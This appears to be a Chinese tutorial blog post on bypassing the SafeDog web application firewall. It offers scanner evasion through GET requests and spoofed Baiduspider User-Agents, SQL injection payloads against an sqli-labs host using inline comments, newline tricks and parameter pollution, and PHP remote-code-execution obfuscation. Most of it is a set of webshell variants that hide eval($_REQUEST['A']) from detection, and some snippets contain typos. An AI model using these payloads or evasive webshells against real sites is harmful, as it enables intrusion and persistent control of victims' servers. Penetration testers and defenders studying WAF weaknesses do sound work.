waf绕过:网络安全狗绕过

引言:

所有的绕过原理都大致一致,但是并不是所有的绕过都能起到作用,渗透测试主要还是一个猜加试的过程,本文仅供参考

网络攻击或扫描绕过

1.get绕过(未开启cc防护)

网络安全狗的默认防护为,拒绝head请求,在扫描工具中大部分使用head请求去收集目录信息,所以改用get请求绕过

2.cc防护绕过

cc防护:和检测流量攻击的原理相同,同一ip并发数过多对其进行禁用
1)延迟绕过:限制扫描速率
2)爬虫引擎:更换User-Agent头
sql 复制代码
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) 
Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)

sql注入绕过

sql内联注释绕过:针对MySQL

mysql为了兼容其他数据,将mysql的特有语句放入/*!100441 */,其他数据库不执行,但在mysql中正常执行

sql 复制代码
//被拦截
http://192.168.10.111/sqli-labs/Less-1/?id=2 and 1=1
//成功注入
http://192.168.10.111/sqli-labs/Less-1/?id=2' /*!10441and*/ 1=2 --+

特殊符号绕过:

%0a:为换行 %23:为#

sql 复制代码
192.168.10.111/sqli-labs/Less-1/?id=2' --+/*%0a and 1=2 union select 1,2,3%23*/
sql 复制代码
-- 最后展现在sql中的语句为
--+/*
and 1=2 union select 1,2,3 #*/

HPP参数污染:针对apache

因为apach接收数据时允许同名数据,并且最后一个数据为有效值,所以只有第最后一个参数后的语句有效

sql 复制代码
192.168.10.111/sqli-labs/Less-1/?id=2' /*&id=2' and 1=2 union select 1,database(),3 %23*/

RCE绕过

变量拼接绕过

waf对某些特殊字符串进行检测时可以使用

php 复制代码
//如果对phpinfo检测,可以把参数改为
$a='php';$b='info';$c=$a.$b;$c();

编码绕过

php 复制代码
assert(base64_decode('cGhwaW5mbygpOw=='));

字符替换绕过

php 复制代码
assert(str_replace('x','','sxyxsxtxexm("ipconfig")'));

传参绕过

php 复制代码
url:rce_eval.php?str=tem
$b=sys;$c=$_GET['str'];$a=$b.$c;$a('ipconfig');

后渗透绕过(木马免杀)

waf中eval和$_REQUEST同时出现时会被拦截

end免杀

end函数取数组最后一个元素

php 复制代码
eval(end($_REQUEST['A']));

define免杀

php 复制代码
define("b","$_REQUEST['A']");
eval(b);

拼接免杀

php 复制代码
$a='ev';
$b='al';
$c=$a.$b;
$d='c';
$$d($_REQUEST['A']);
//等价于eval($_REQUEST['A']);

函数免杀

php 复制代码
function abc($b){
    returb $b;
}
$a = abc("$_REQUEST['A']");
eval($a);

类定义绕过

php 复制代码
class user{
    $name='';
    function __construct($name){
        $this->name=$name;
    }
    function __destruct(){
        eval($this->name);
    }
}
$a=new user($_REQUEST['A']);

cookie绕过

php 复制代码
$cookie = $_COOKIE;
foreach($cookie as $key => $value){
    if($key=='eval'){
        $key($_REQUEST['A']);
    }
}

预定义函数绕过

php 复制代码
$defun = $get_define_functions();
//使用defun获取assert
$defun['internal'][841]($_REQUEST['A']);

编码绕过

php 复制代码
eval(base64_decode('JF9SRVFVRVNUWydBJ10='));

并不是所有方式都是有用

对于pc防火墙免杀如 火绒、360,也可以使用相同的思路

对于火绒免杀,有效的方法

相关推荐
爱宇阳1 小时前
Linux 安全加固:设置命令行无操作超时退出
linux·运维·安全
龙亘川2 小时前
【课程3.4】高可用架构保障:Control节点、存储平面、安全防护的架构选型
安全·平面·架构·智慧城市
安科瑞小许3 小时前
高校宿舍电气安全新防线:浅析电气防火限流式保护技术
大数据·人工智能·安全·防火灾·限电流保护
timeweaver3 小时前
React Server Components 再曝高危漏洞:拒绝服务与源码泄露接踵而至
前端·安全
GEM的左耳返3 小时前
互联网大厂Java求职面试题解析与实战指导:涵盖核心技术栈与业务场景
java·数据库·spring boot·安全·微服务·消息队列·面试题
码农12138号4 小时前
Bugku NUAACTF 2020 command-injection
web安全·代码审计·bugku·文件包含漏洞
csdn5659738504 小时前
安全体检 | 服务器的终极卫士
运维·服务器·安全
iknow1814 小时前
【Web安全】SSRF
安全·web安全
KKKlucifer5 小时前
2025 AI 安全攻防战:智能体崛起下的 “守护与突围
人工智能·安全
WADesk---瓜子5 小时前
AI 文本检测工具在内容行业的应用:从原创度判断到内容安全审查的全流程解析
人工智能·安全